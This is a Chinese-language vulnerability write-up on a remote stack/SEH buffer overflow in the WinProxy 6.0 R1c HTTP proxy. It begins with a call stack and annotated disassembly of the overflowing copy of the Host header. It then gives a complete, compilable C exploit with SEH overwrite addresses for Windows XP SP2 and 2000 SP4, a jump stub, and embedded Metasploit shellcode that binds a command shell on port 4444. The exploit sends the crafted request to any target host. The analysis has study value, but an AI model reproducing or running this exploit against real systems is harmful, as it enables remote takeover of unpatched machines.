winproxy 6.0 r1c stack/seh overflow 分析

[0] 难得经典的远程堆栈溢出，又很好利用，分析下记个笔记，有问题请联系我。

[1] 调用堆栈
WinProxy.0051F050
    |
    WinProxy.0051F4D0
        |
        WinProxy.00435E00
            |
            WinProxy.004360B0
                |
                WinProxy.00434200
                    |
                    WinProxy.005D9F80
                        |
                        WinProxy.005DE080

[2] 反汇编代码分析
----------------------造成溢出的调用------------------------
sub_5DE080      proc near               ; CODE XREF: sub_5D9F80+1ABFp
.text:005DE080                                         ; sub_5DD1A0+11Ep
.text:005DE080
.text:005DE080 var_44          = dword ptr -44h
.text:005DE080 var_40          = dword ptr -40h
.text:005DE080 var_3C          = dword ptr -3Ch
.text:005DE080 var_38          = dword ptr -38h
.text:005DE080 var_34          = dword ptr -34h
.text:005DE080 var_C           = dword ptr -0Ch
.text:005DE080 var_4           = dword ptr -4
.text:005DE080 arg_0           = dword ptr  4
.text:005DE080 arg_4           = dword ptr  8
.text:005DE080 arg_8           = dword ptr  0Ch
.text:005DE080
.text:005DE080                 push    0FFFFFFFFh
.text:005DE082                 push    offset loc_6613E8
.text:005DE087                 mov     eax, large fs:0
.text:005DE08D                 push    eax
.text:005DE08E                 mov     large fs:0, esp
.text:005DE095                 sub     esp, 38h        ; 这里只分配了38h(56)字节大小的堆栈，造成溢出的前提
.text:005DE098                 push    ebx
.text:005DE099                 mov     ebx, [esp+48h+arg_8]
.text:005DE09D                 mov     eax, 80h
.text:005DE0A2                 push    ebp
.text:005DE0A3                 push    esi
.text:005DE0A4                 cmp     ebx, eax
.text:005DE0A6                 push    edi
.text:005DE0A7                 mov     [esp+54h+var_38], eax
.text:005DE0AB                 mov     [esp+54h+var_40], eax
.text:005DE0AF                 jl      short loc_5DE0BB
.text:005DE0B1                 lea     eax, [ebx+80h]
.text:005DE0B7                 mov     [esp+54h+var_40], eax
.text:005DE0BB
.text:005DE0BB loc_5DE0BB:                             ; CODE XREF: sub_5DE080+2Fj
.text:005DE0BB                 push    eax
.text:005DE0BC                 call    sub_61F390
.text:005DE0C1                 mov     edx, [esp+58h+arg_4]
.text:005DE0C5                 mov     ecx, ebx
.text:005DE0C7                 mov     [esp+58h+var_44], eax
.text:005DE0CB                 mov     edi, eax
.text:005DE0CD                 mov     eax, ecx
.text:005DE0CF                 mov     esi, edx
.text:005DE0D1                 shr     ecx, 2
.text:005DE0D4                 mov     [esp+58h+var_3C], ebx
.text:005DE0D8                 rep movsd
.text:005DE0DA                 mov     ecx, eax
.text:005DE0DC                 and     ecx, 3
.text:005DE0DF                 rep movsb
.text:005DE0E1                 mov     ecx, [esp+58h+var_44]
.text:005DE0E5                 mov     byte ptr [ecx+ebx], 0
.text:005DE0E9                 push    edx
.text:005DE0EA                 mov     [esp+5Ch+var_4], 0
.text:005DE0F2                 call    sub_61F3D0
.text:005DE0F7                 lea     edx, [esp+5Ch+var_44]
.text:005DE0FB                 push    edx
.text:005DE0FC                 call    sub_5DE360
.text:005DE101                 mov     edi, offset aHttp_1 ; "http://"
.text:005DE106                 or      ecx, 0FFFFFFFFh
.text:005DE109                 xor     eax, eax
.text:005DE10B                 add     esp, 0Ch
.text:005DE10E                 repne scasb
.text:005DE110                 not     ecx
.text:005DE112                 sub     edi, ecx
.text:005DE114                 lea     edx, [esp+54h+var_34]
.text:005DE118                 mov     eax, ecx
.text:005DE11A                 mov     esi, edi
.text:005DE11C                 mov     edi, edx
.text:005DE11E                 shr     ecx, 2
.text:005DE121                 rep movsd
.text:005DE123                 mov     ecx, eax
.text:005DE125                 mov     eax, dword_7227F4
.text:005DE12A                 and     ecx, 3
.text:005DE12D                 test    eax, eax
.text:005DE12F                 rep movsb
.text:005DE131                 jz      loc_5DE1FD
.text:005DE137                 mov     ecx, dword_7227E8
.text:005DE13D                 xor     eax, eax
.text:005DE13F                 lea     edx, [esp+54h+var_34]
.text:005DE143                 lea     edi, [ecx+7E9Ch]
.text:005DE149                 or      ecx, 0FFFFFFFFh
.text:005DE14C                 repne scasb
.text:005DE14E                 not     ecx
.text:005DE150                 sub     edi, ecx
.text:005DE152                 mov     esi, edi
.text:005DE154                 mov     ebx, ecx
.text:005DE156                 mov     edi, edx
.text:005DE158                 or      ecx, 0FFFFFFFFh
.text:005DE15B                 repne scasb
.text:005DE15D                 mov     ecx, ebx
.text:005DE15F                 dec     edi
.text:005DE160                 shr     ecx, 2
.text:005DE163                 rep movsd
.text:005DE165                 mov     ecx, ebx
.text:005DE167                 mov     eax, offset aHttpAdmin_wi_4 ; "http://Admin.WinProxy"
.text:005DE16C                 and     ecx, 3
.text:005DE16F                 test    eax, eax
.text:005DE171                 rep movsb
.text:005DE173                 jz      loc_5DE2C9
.text:005DE179                 lea     ecx, [esp+54h+var_34]
.text:005DE17D                 test    ecx, ecx
.text:005DE17F                 jz      loc_5DE2C9
.text:005DE185                 mov     edi, eax
.text:005DE187                 or      ecx, 0FFFFFFFFh
.text:005DE18A                 xor     eax, eax
.text:005DE18C                 mov     edx, [esp+54h+var_44]
.text:005DE190                 repne scasb
.text:005DE192                 not     ecx
.text:005DE194                 dec     ecx
.text:005DE195                 lea     edi, [esp+54h+var_34]
.text:005DE199                 mov     ebx, ecx
.text:005DE19B                 or      ecx, 0FFFFFFFFh
.text:005DE19E                 repne scasb
.text:005DE1A0                 not     ecx
.text:005DE1A2                 dec     ecx
.text:005DE1A3                 push    offset aHttpAdmin_wi_4 ; char *
.text:005DE1A8                 push    edx             ; char *
.text:005DE1A9                 mov     edi, ecx
.text:005DE1AB                 call    _strstr
.text:005DE1B0                 add     esp, 8
.text:005DE1B3                 test    eax, eax
.text:005DE1B5                 jz      loc_5DE2C9
.text:005DE1BB                 sub     eax, [esp+54h+var_44]
.text:005DE1BF                 mov     esi, eax
.text:005DE1C1                 js      loc_5DE2C9
.text:005DE1C7
.text:005DE1C7 loc_5DE1C7:                             ; CODE XREF: sub_5DE080+176j
.text:005DE1C7                 push    ebx
.text:005DE1C8                 push    esi
.text:005DE1C9                 lea     ecx, [esp+5Ch+var_44]
.text:005DE1CD                 call    sub_4501B0
.text:005DE1D2                 lea     eax, [esp+54h+var_34]
.text:005DE1D6                 lea     ecx, [esp+54h+var_44]
.text:005DE1DA                 push    eax
.text:005DE1DB                 push    esi
.text:005DE1DC                 call    sub_450220
.text:005DE1E1                 add     esi, edi
.text:005DE1E3                 lea     ecx, [esp+54h+var_44]
.text:005DE1E7                 push    esi
.text:005DE1E8                 push    offset aHttpAdmin_wi_4 ; "http://Admin.WinProxy"
.text:005DE1ED                 call    sub_450590
.text:005DE1F2                 mov     esi, eax
.text:005DE1F4                 test    esi, esi
.text:005DE1F6                 jge     short loc_5DE1C7
.text:005DE1F8                 jmp     loc_5DE2C9
.text:005DE1FD ; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪?
.text:005DE1FD
.text:005DE1FD loc_5DE1FD:                             ; CODE XREF: sub_5DE080+B1j
.text:005DE1FD                 mov     eax, dword_7227E0
.text:005DE202                 test    eax, eax
.text:005DE204                 jz      loc_5DE2C9
.text:005DE20A                 jge     short loc_5DE21E
.text:005DE20C                 mov     ecx, 2
.text:005DE211                 sub     ecx, eax
.text:005DE213                 push    ecx
.text:005DE214                 mov     ecx, offset dword_7227D8
.text:005DE219                 call    sub_412300
.text:005DE21E
.text:005DE21E loc_5DE21E:                             ; CODE XREF: sub_5DE080+18Aj
.text:005DE21E                 mov     edi, dword_7227D8
.text:005DE224                 or      ecx, 0FFFFFFFFh
.text:005DE227                 xor     eax, eax
.text:005DE229                 lea     edx, [esp+54h+var_34]
.text:005DE22D                 repne scasb
.text:005DE22F                 not     ecx
.text:005DE231                 sub     edi, ecx
.text:005DE233                 mov     esi, edi
.text:005DE235                 mov     ebx, ecx
.text:005DE237                 mov     edi, edx
.text:005DE239                 or      ecx, 0FFFFFFFFh
.text:005DE23C                 repne scasb             ; 指针指到字符串末尾
.text:005DE23E                 mov     ecx, ebx
.text:005DE240                 dec     edi
.text:005DE241                 shr     ecx, 2          ; 416字节
.text:005DE244                 rep movsd               ; 复制主机名，造成溢出
.text:005DE246                 mov     ecx, ebx
.text:005DE248                 mov     eax, offset aHttpAdmin_wi_4 ; "http://Admin.WinProxy"
.text:005DE24D                 and     ecx, 3
.text:005DE250                 test    eax, eax
.text:005DE252                 rep movsb
.text:005DE254                 jz      short loc_5DE2C9
.text:005DE256                 lea     ecx, [esp+54h+var_34]
.text:005DE25A                 test    ecx, ecx
.text:005DE25C                 jz      short loc_5DE2C9
.text:005DE25E                 mov     edi, eax
.text:005DE260                 or      ecx, 0FFFFFFFFh
.text:005DE263                 xor     eax, eax
.text:005DE265                 mov     edx, [esp+54h+var_44]
.text:005DE269                 repne scasb
.text:005DE26B                 not     ecx
.text:005DE26D                 dec     ecx
.text:005DE26E                 lea     edi, [esp+54h+var_34]
.text:005DE272                 mov     ebx, ecx
.text:005DE274                 or      ecx, 0FFFFFFFFh
.text:005DE277                 repne scasb
.text:005DE279                 not     ecx
.text:005DE27B                 dec     ecx
.text:005DE27C                 push    offset aHttpAdmin_wi_4 ; char *
.text:005DE281                 push    edx             ; char *
.text:005DE282                 mov     edi, ecx
.text:005DE284                 call    _strstr
.text:005DE289                 add     esp, 8
.text:005DE28C                 test    eax, eax
.text:005DE28E                 jz      short loc_5DE2C9
.text:005DE290                 sub     eax, [esp+54h+var_44]
.text:005DE294                 mov     esi, eax
.text:005DE296                 js      short loc_5DE2C9
.text:005DE298
.text:005DE298 loc_5DE298:                             ; CODE XREF: sub_5DE080+247j
.text:005DE298                 push    ebx
.text:005DE299                 push    esi
.text:005DE29A                 lea     ecx, [esp+5Ch+var_44]
.text:005DE29E                 call    sub_4501B0
.text:005DE2A3                 lea     eax, [esp+54h+var_34]
.text:005DE2A7                 lea     ecx, [esp+54h+var_44]
.text:005DE2AB                 push    eax
.text:005DE2AC                 push    esi
.text:005DE2AD                 call    sub_450220
.text:005DE2B2                 add     esi, edi
.text:005DE2B4                 lea     ecx, [esp+54h+var_44]
.text:005DE2B8                 push    esi
.text:005DE2B9                 push    offset aHttpAdmin_wi_4 ; "http://Admin.WinProxy"
.text:005DE2BE                 call    sub_450590
.text:005DE2C3                 mov     esi, eax
.text:005DE2C5                 test    esi, esi
.text:005DE2C7                 jge     short loc_5DE298
.text:005DE2C9
.text:005DE2C9 loc_5DE2C9:                             ; CODE XREF: sub_5DE080+F3j
.text:005DE2C9                                         ; sub_5DE080+FFj ...
.text:005DE2C9                 mov     ebx, [esp+54h+var_3C]
.text:005DE2CD                 lea     ecx, [ebx+1]
.text:005DE2D0                 push    ecx
.text:005DE2D1                 call    sub_61F390
.text:005DE2D6                 mov     ebp, eax
.text:005DE2D8                 add     esp, 4
.text:005DE2DB                 mov     byte ptr [ebx+ebp], 0
.text:005DE2DF                 mov     eax, [esp+54h+var_3C]
.text:005DE2E3                 test    eax, eax
.text:005DE2E5                 jge     short loc_5DE2F8
.text:005DE2E7                 mov     edx, 2
.text:005DE2EC                 lea     ecx, [esp+54h+var_44]
.text:005DE2F0                 sub     edx, eax
.text:005DE2F2                 push    edx
.text:005DE2F3                 call    sub_412300
.text:005DE2F8
.text:005DE2F8 loc_5DE2F8:                             ; CODE XREF: sub_5DE080+265j
.text:005DE2F8                 mov     esi, [esp+54h+var_44]
.text:005DE2FC                 mov     ecx, ebx
.text:005DE2FE                 mov     eax, ecx
.text:005DE300                 mov     edi, ebp
.text:005DE302                 shr     ecx, 2
.text:005DE305                 rep movsd
.text:005DE307                 mov     ecx, eax
.text:005DE309                 push    0
.text:005DE30B                 and     ecx, 3
.text:005DE30E                 push    1
.text:005DE310                 rep movsb
.text:005DE312                 mov     ecx, [esp+5Ch+arg_0] ;
.text:005DE312                                         ; 取得栈里的局部变量，栈被覆盖后，该变量也被覆盖，
.text:005DE312                                         ; 这里是造成下面调用里异常的成因
.text:005DE316                 push    0
.text:005DE318                 push    0
.text:005DE31A                 push    ebx
.text:005DE31B                 push    ebp
.text:005DE31C                 add     ecx, 2B8h
.text:005DE322                 call    sub_42D0E0      ; 进入触发异常的调用
.text:005DE327                 mov     esi, eax
.text:005DE329                 mov     eax, [esp+54h+var_44]
.text:005DE32D                 test    eax, eax
.text:005DE32F                 mov     [esp+54h+var_4], 0FFFFFFFFh
.text:005DE337                 jz      short loc_5DE342
.text:005DE339                 push    eax
.text:005DE33A                 call    sub_61F3D0
.text:005DE33F                 add     esp, 4
.text:005DE342
.text:005DE342 loc_5DE342:                             ; CODE XREF: sub_5DE080+2B7j
.text:005DE342                 mov     ecx, [esp+54h+var_C]
.text:005DE346                 mov     eax, esi
.text:005DE348                 pop     edi
.text:005DE349                 pop     esi
.text:005DE34A                 pop     ebp
.text:005DE34B                 pop     ebx
.text:005DE34C                 mov     large fs:0, ecx
.text:005DE353                 add     esp, 44h
.text:005DE356                 retn    0Ch
.text:005DE356 sub_5DE080      endp

---------------------触发异常的子调用----------------------
.text:0042D0E0 sub_42D0E0      proc near               ; CODE XREF: sub_421AF0+34Fp
.text:0042D0E0                                         ; sub_421E90+94p ...
.text:0042D0E0
.text:0042D0E0 arg_0           = dword ptr  0Ch
.text:0042D0E0 arg_4           = dword ptr  10h
.text:0042D0E0 arg_8           = dword ptr  14h
.text:0042D0E0 arg_C           = dword ptr  18h
.text:0042D0E0 arg_10          = dword ptr  1Ch
.text:0042D0E0 arg_14          = dword ptr  20h
.text:0042D0E0
.text:0042D0E0                 push    esi
.text:0042D0E1                 push    edi
.text:0042D0E2                 mov     esi, ecx        ; 把ecx传送给esi，触发异常的原因
.text:0042D0E4                 push    28h
.text:0042D0E6                 call    sub_61F390
.text:0042D0EB                 xor     edx, edx
.text:0042D0ED                 add     esp, 4
.text:0042D0F0                 cmp     eax, edx
.text:0042D0F2                 jz      short loc_42D114
.text:0042D0F4                 mov     [eax], edx
.text:0042D0F6                 mov     [eax+8], edx
.text:0042D0F9                 mov     [eax+0Ch], edx
.text:0042D0FC                 mov     [eax+10h], edx
.text:0042D0FF                 mov     [eax+14h], edx
.text:0042D102                 mov     dword ptr [eax+18h], 1
.text:0042D109                 mov     [eax+1Ch], edx
.text:0042D10C                 mov     [eax+20h], edx
.text:0042D10F                 mov     [eax+24h], edx
.text:0042D112                 jmp     short loc_42D116
.text:0042D114 ; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪?
.text:0042D114
.text:0042D114 loc_42D114:                             ; CODE XREF: sub_42D0E0+12j
.text:0042D114                 xor     eax, eax
.text:0042D116
.text:0042D116 loc_42D116:                             ; CODE XREF: sub_42D0E0+32j
.text:0042D116                 mov     ecx, [esp+arg_10]
.text:0042D11A                 mov     [eax+18h], ecx
.text:0042D11D                 mov     ecx, [esp+arg_8]
.text:0042D121                 cmp     ecx, edx
.text:0042D123                 jnz     short loc_42D12A
.text:0042D125                 mov     ecx, [esi+1Ch]  ; 溢出覆盖堆栈数据后，esi的内容被改写，造成这里读内存异常，
.text:0042D125                                         ; 覆盖堆栈里的结构化异常处理程序就成功利用了，所以利用程序很好写
.text:0042D128                 jmp     short loc_42D137
.text:0042D12A ; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪?
.text:0042D12A
.text:0042D12A loc_42D12A:                             ; CODE XREF: sub_42D0E0+43j
.text:0042D12A                 cmp     ecx, 0FFFFFFFFh
.text:0042D12D                 jnz     short loc_42D137
.text:0042D12F                 mov     ecx, [esi+1Ch]
.text:0042D132                 mov     edi, [esi+14h]
.text:0042D135                 add     ecx, edi
.text:0042D137
.text:0042D137 loc_42D137:                             ; CODE XREF: sub_42D0E0+48j
.text:0042D137                                         ; sub_42D0E0+4Dj
.text:0042D137                 mov     edi, [esp+arg_C]
.text:0042D13B                 mov     [eax], edx
.text:0042D13D                 cmp     edi, edx
.text:0042D13F                 jz      short loc_42D146
.text:0042D141                 mov     [eax+4], edx
.text:0042D144                 jmp     short loc_42D14D
.text:0042D146 ; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪?
.text:0042D146
.text:0042D146 loc_42D146:                             ; CODE XREF: sub_42D0E0+5Fj
.text:0042D146                 mov     dword ptr [eax+4], 3
.text:0042D14D
.text:0042D14D loc_42D14D:                             ; CODE XREF: sub_42D0E0+64j
.text:0042D14D                 mov     edx, [esp+arg_0]
.text:0042D151                 mov     edi, [esp+arg_4]
.text:0042D155                 mov     [eax+8], ecx
.text:0042D158                 mov     ecx, [esp+arg_14]
.text:0042D15C                 mov     [eax+24h], ecx
.text:0042D15F                 push    eax
.text:0042D160                 mov     ecx, esi
.text:0042D162                 mov     [eax+0Ch], edx
.text:0042D165                 mov     [eax+10h], edi
.text:0042D168                 call    sub_42DD40
.text:0042D16D                 mov     eax, [esi+18h]
.text:0042D170                 add     eax, edi
.text:0042D172                 pop     edi
.text:0042D173                 mov     [esi+18h], eax
.text:0042D176                 mov     ecx, eax
.text:0042D178                 mov     eax, [esi+14h]
.text:0042D17B                 pop     esi
.text:0042D17C                 add     eax, ecx
.text:0042D17E                 retn    18h
.text:0042D17E sub_42D0E0      endp

[3] 溢出利用程序

/*
** 
** winproxy 6.0 r1c remote stack/seh overflow exploit
**
** luoluonet@hotmail.com
**
** description: http://www.idefense.com/intelligence/vulnerabilities/display.php?id=365 
**
** reference: http://www.milw0rm.com/id.php?id=1408
**
*/
#include <stdio.h>
#include <winsock2.h>

#pragma comment(lib, "ws2_32.lib")

#define BUFFER_SIZE 1024

void SendBuffer(char *szHost, int nPort, char *szBuffer, int nLen);

char szFormat[] = "GET / HTTP/1.0\r\nHost: localhost%s\r\n\r\n";

//
// pavinet.dll内的 pop ra pop rb ret 指令序列，具体的操作系统可以用ollydbg查找之
//
unsigned char seh[] = "\xf0\xea\x3f\x01";    // xp sp2
//unsigned char seh[] = "\xf0\xea\x78\x01";    // 2k sp4

unsigned char jmp[] = "\x90\x90\xeb\x10";

// shellcode from metasploit.org, bind cmd shell on port 4444
unsigned char sc[]    = "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x26"
        "\x8c\x6d\xa3\x83\xeb\xfc\xe2\xf4\xda\xe6\x86\xee\xce\x75\x92\x5c"
        "\xd9\xec\xe6\xcf\x02\xa8\xe6\xe6\x1a\x07\x11\xa6\x5e\x8d\x82\x28"
        "\x69\x94\xe6\xfc\x06\x8d\x86\xea\xad\xb8\xe6\xa2\xc8\xbd\xad\x3a"
        "\x8a\x08\xad\xd7\x21\x4d\xa7\xae\x27\x4e\x86\x57\x1d\xd8\x49\x8b"
        "\x53\x69\xe6\xfc\x02\x8d\x86\xc5\xad\x80\x26\x28\x79\x90\x6c\x48"
        "\x25\xa0\xe6\x2a\x4a\xa8\x71\xc2\xe5\xbd\xb6\xc7\xad\xcf\x5d\x28"
        "\x66\x80\xe6\xd3\x3a\x21\xe6\xe3\x2e\xd2\x05\x2d\x68\x82\x81\xf3"
        "\xd9\x5a\x0b\xf0\x40\xe4\x5e\x91\x4e\xfb\x1e\x91\x79\xd8\x92\x73"
        "\x4e\x47\x80\x5f\x1d\xdc\x92\x75\x79\x05\x88\xc5\xa7\x61\x65\xa1"
        "\x73\xe6\x6f\x5c\xf6\xe4\xb4\xaa\xd3\x21\x3a\x5c\xf0\xdf\x3e\xf0"
        "\x75\xdf\x2e\xf0\x65\xdf\x92\x73\x40\xe4\x7c\xff\x40\xdf\xe4\x42"
        "\xb3\xe4\xc9\xb9\x56\x4b\x3a\x5c\xf0\xe6\x7d\xf2\x73\x73\xbd\xcb"
        "\x82\x21\x43\x4a\x71\x73\xbb\xf0\x73\x73\xbd\xcb\xc3\xc5\xeb\xea"
        "\x71\x73\xbb\xf3\x72\xd8\x38\x5c\xf6\x1f\x05\x44\x5f\x4a\x14\xf4"
        "\xd9\x5a\x38\x5c\xf6\xea\x07\xc7\x40\xe4\x0e\xce\xaf\x69\x07\xf3"
        "\x7f\xa5\xa1\x2a\xc1\xe6\x29\x2a\xc4\xbd\xad\x50\x8c\x72\x2f\x8e"
        "\xd8\xce\x41\x30\xab\xf6\x55\x08\x8d\x27\x05\xd1\xd8\x3f\x7b\x5c"
        "\x53\xc8\x92\x75\x7d\xdb\x3f\xf2\x77\xdd\x07\xa2\x77\xdd\x38\xf2"
        "\xd9\x5c\x05\x0e\xff\x89\xa3\xf0\xd9\x5a\x07\x5c\xd9\xbb\x92\x73"
        "\xad\xdb\x91\x20\xe2\xe8\x92\x75\x74\x73\xbd\xcb\x58\x54\x8f\xd0"
        "\x75\x73\xbb\x5c\xf6\x8c\x6d\xa3";

void main(int argc, char *argv[])
{
    char szBuffer[BUFFER_SIZE] = {0};
    char szPadding[BUFFER_SIZE] = {0};

    if (argc != 3)
    {
        printf("usage:\n  winproxy <host> <port>\n");
        return;
    }

    if (strlen(argv[1]) > 32)
    {
        printf("error: too long hostname\n");
        return;
    }

    memset(szPadding, 0x90, 24);
    memcpy(szPadding + 24, jmp, 4);
    memcpy(szPadding + 24 + 4, seh, 4);
    memset(szPadding + 24 + 4 + 4, 0x90, 32);
    memcpy(szPadding + 24 + 4 + 4 + 32, sc, sizeof(sc));

    sprintf(szBuffer, szFormat, szPadding);
    
    SendBuffer(argv[1], atoi(argv[2]), szBuffer, sizeof(szBuffer));
}

void SendBuffer(char *szHost, int nPort, char *szBuffer, int nLen)
{
    WSADATA WSAData;
    SOCKET s;
    SOCKADDR_IN addr_in;
    int nBytesSend = 0;

    if (WSAStartup(MAKEWORD(2, 0), &WSAData) != 0)
    {
        printf("error: failed WSAStartup\n");
        return;
    }

    if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET)
    {
        printf("error: failed socket\n");
        return;
    }

    addr_in.sin_family = AF_INET;
    addr_in.sin_port = htons(nPort);
    addr_in.sin_addr.S_un.S_addr = inet_addr(szHost);

    if (connect(s, (SOCKADDR *)&addr_in, sizeof(SOCKADDR)))
    {
        printf("error: failed connect\n");
        goto _exit;
    }

    if ((nBytesSend = send(s, szBuffer, nLen, 0)) == SOCKET_ERROR)
    {
        printf("error: failed send\n");
        goto _exit;
    }

    printf("[+] totally %d bytes has been sended\n", nBytesSend);

_exit:
    closesocket(s);
    WSACleanup();
}